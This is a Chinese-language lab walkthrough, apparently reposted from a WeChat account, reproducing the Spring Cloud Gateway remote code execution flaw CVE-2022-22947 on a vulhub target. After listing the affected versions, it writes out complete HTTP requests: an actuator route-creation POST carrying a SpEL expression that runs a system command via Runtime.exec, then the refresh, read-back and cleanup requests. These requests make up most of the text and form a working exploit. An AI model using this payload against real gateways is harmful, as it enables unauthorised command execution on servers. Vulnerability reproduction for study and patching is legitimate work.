一、漏洞描述:
二、影响版本:
Spring Cloud Gateway 3.1.x < 3.1.1
Spring Cloud Gateway 3.0.x < 3.0.7
旧的、不受支持的版本也会受到影响
Spring Cloud Gateway 其他已不再更新的版本****
三、漏洞复现
1. 环境搭建 kali搭建vulhub靶场
搭建教程可参考https://www.cnblogs.com/lxfweb/p/12952490.html
2. 进入靶场环境
3. 访问靶场地址 8080端口
靶机地址端口和bp代理的端口冲突 我们修改一下bp代理即可
4. 构建恶意请求包
POST /actuator/gateway/routes/hacktest HTTP/1.1Host: 自己的ip:8080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Connection: closeContent-Type: application/jsonContent-Length: 314{"whoami": "hacktest","filters": [{"name": "AddResponseHeader","args": {"name": "Result","value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"id"}).getInputStream()))}"}}],"uri": "http://example.com"}
5. 应用刚才的数据包发送,会触发表达式执行
POST /actuator/gateway/refresh HTTP/1.1Host: 192.168.111.129:8080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 2
6. 发送如下数据包可以发现,成功执行
GET /actuator/gateway/routes/hacktest HTTP/1.1Host: 192.168.111.129:8080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 2
7. 最后删除路由的数据包信息,删除添加的路由
DELETE /actuator/gateway/routes/hacktest HTTP/1.1Host: 192.168.32.129:8080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Connection: close
8. 再次刷新查看一下路由
POST /actuator/gateway/refresh HTTP/1.1Host: 192.168.32.129:8080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 6
成功!
原文始发于微信公众号(北京路劲科技有限公司):SpringCloudGateway漏洞复现(CVE-2022-22947)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论